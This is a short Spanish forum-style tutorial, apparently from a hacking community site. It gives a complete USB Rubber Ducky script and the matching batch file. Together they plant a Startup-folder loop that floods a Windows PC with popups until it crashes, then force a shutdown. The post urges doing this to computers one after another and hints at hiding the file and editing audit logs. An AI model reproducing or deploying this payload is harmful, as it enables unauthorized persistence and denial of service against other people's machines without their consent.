Paso número 1
Compras un Rubber Ducky (Hak5 o AliExpress)
Paso número 2
Creas un script el cual cree un .bat en la carpeta "C:\Users\
"usuario"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" con el comando copy con ejemplo.bat, pones lo siguiente:
Código:
echo
:bucle
msg * www.nodo313.net
msg * www.nodo313.net
msg * www.nodo313.net
goto bucle
Y ya estaría, el script en Ducky Script sería:
Código:
DELAY 1000
GUI r
STRING cmd
DELAY 200
ENTER
STRING cd AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
DELAY 100
ENTER
STRING copy con nodo313.bat
ENTER
STRING echo
ENTER
STRING :bucle
ENTER
STRING msg * www.nodo313.net
ENTER
STRING msg * www.nodo313.net
ENTER
STRING msg * www.nodo313.net
ENTER
STRING goto bucle
ENTER
DELAY 500
CTRL C
STRING shutdown -s -t 5
ENTER
Y ya estaría, esto hará que cada vez que se encienda el PC/se acceda al usuario en cuestión, se abran miles de ventanitas diciendo:
www.nodo313.net, hasta que el pc crashee o se apague a la fuerza.
Solo se podrá borrar el .bat si se es más rápido que el ordenador, en plan, inicias sesión, Windows + r, shell:startup y borras el .bat de la carpeta.
También hay otra forma de que un archivo se ejecute al iniciar el usuario sin tener que estar en esa carpeta, lo puedes meter en una carpeta remotamente oculta, por ejemplo una de algún programa del ordenador, ya haré un post de este script (es tema editar registros de auditoría).
Si no tienes un duro o no quieres comprar el Rubber Ducky, puedes crear tu mismo el .bat en dicha carpeta manualmente.
Windows + r
shell:startup
creas un archivo de texto
pones:
echo
:bucle
msg *
www.nodo313.net
msg *
www.nodo313.net
msg *
www.nodo313.net
goto bucle
y lo guardas como el nombre que te de la gana y .bat, eso en todos los ordenadores, el Rubber Ducky hace ese proceso en cuestión de segundos, conectas el USB, cuentas hasta 10 y ale, lo desconectas y a por otro ordenador.